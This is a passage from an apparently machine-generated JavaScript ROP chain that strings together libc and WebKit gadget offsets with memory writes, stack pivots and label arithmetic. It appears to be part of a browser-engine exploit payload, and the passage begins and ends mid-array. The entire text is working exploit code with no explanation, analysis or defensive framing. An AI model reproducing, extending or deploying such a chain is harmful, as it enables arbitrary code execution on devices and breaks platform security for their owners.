ropchain+267760, //L5022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+267728, //L5020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+267744, //L5021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5020: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5022: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+267848, //L5024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5023: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5024: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+267904, //L5025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5025: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5027: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+267984, //L5029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5029: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+268088, //L5030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+268104, //L5031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5030: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L5031: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+268192, //L5033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5033: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+268248, //L5034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5034: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+268320, //L5037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5037: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+268376, //L5038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5038: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+271584, //L5040 //L4981: libc_base+764760, //pop rsi ropchain+268480, //L5041 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5041: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5043: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+268600, //L5046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+268584, //L5044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5044: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5046: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+268776, //L5049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+268792, //L5050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+268744, //L5047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+268760, //L5048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5047: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5048: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5049: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5050: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+268888, //L5052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+268872, //L5051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5051: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5052: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5053: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5054: db([3, 0]); // 0x3 
set_gadget(libc_base+763368,); //pop rcx //L5055: db([3, 0]); // 0x3 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+269088, //L5057 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5057: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+269144, //L5058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5058: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+269280, //L5062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+269264, //L5061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5060: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L5061: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5062: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+269416, //L5065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+269448, //L5067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269400, //L5064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5064: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5065: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5066: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L5067: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+269560, //L5068+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+269552, //L5068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5068: db([0, 0]); // 0x0 set_gadgets([ ropchain+269576, //L5068+24 ropchain+271584, //L5063 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+269616, //L5069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5069: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5070: db([32, 0]); // 0x20 set_gadget(libc_base+144605,); //pop rdi //L5071: db([32, 0]); // 0x20 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+269808, //L5075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+269776, //L5073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269792, //L5074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5072: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5073: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5075: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+269864, //L5077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5077: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+269992, //L5079 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+270008, //L5080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+269976, //L5078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5078: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5079: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5080: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+270104, //L5082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+270088, //L5081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5081: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5082: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270184, //L5083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5083: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5085: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+270304, //L5088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270288, //L5086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5086: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5088: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+270448, //L5091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+270416, //L5089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+270432, //L5090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5089: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5090: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5091: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+270520, //L5093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5093: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270576, //L5094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5094: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+270656, //L5096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5096: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5098: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+270776, //L5101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+270760, //L5099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5099: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5101: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+270920, //L5104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+270888, //L5102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+270904, //L5103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5102: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5103: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5104: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+271008, //L5106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L5105: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L5106: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+271064, //L5107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5107: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5109: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+271144, //L5111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5111: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+271248, //L5112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+271264, //L5113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5112: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5113: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+271352, //L5115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5115: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+271408, //L5116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5116: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+271480, //L5119 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5119: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+271536, //L5120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5120: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L5063: //L5040: //L4958: //L4869: libc_base+764760, //pop rsi ropchain+271624, //L5122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5122: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5124: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+271744, //L5127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+271728, //L5125 webkit_base+660161, //mov [rsi], 
rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5125: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5127: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+271920, //L5130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+271936, //L5131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+271888, //L5128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+271904, //L5129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5128: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5129: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5130: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5131: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+272032, //L5133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+272016, //L5132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5132: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5133: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272112, //L5134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5134: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5136: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+272232, //L5139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272216, //L5137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5137: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5139: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+272408, //L5142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+272424, //L5143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272376, //L5140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+272392, //L5141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5140: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5141: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5142: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5143: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+272520, //L5145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+272504, //L5144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5144: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5145: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272600, //L5146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5146: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5148: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, 
//add rax, rsi libc_base+764760, //pop rsi ropchain+272720, //L5151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272704, //L5149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5149: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5151: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+272864, //L5154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+272832, //L5152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+272848, //L5153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5152: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5153: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5154: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+272944, //L5155 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5155: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5157: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273064, //L5160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273048, //L5158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5158: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5160: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273208, //L5163 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273176, //L5161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273192, //L5162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5161: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5162: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5163: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273288, //L5164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5166: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273408, //L5169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273392, //L5167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5167: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5169: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273552, //L5172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273520, //L5170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+273536, //L5171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5170: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5171: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5172: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+273632, //L5173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5173: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5175: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+273752, //L5178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+273736, //L5176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5176: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5178: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+273896, //L5181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 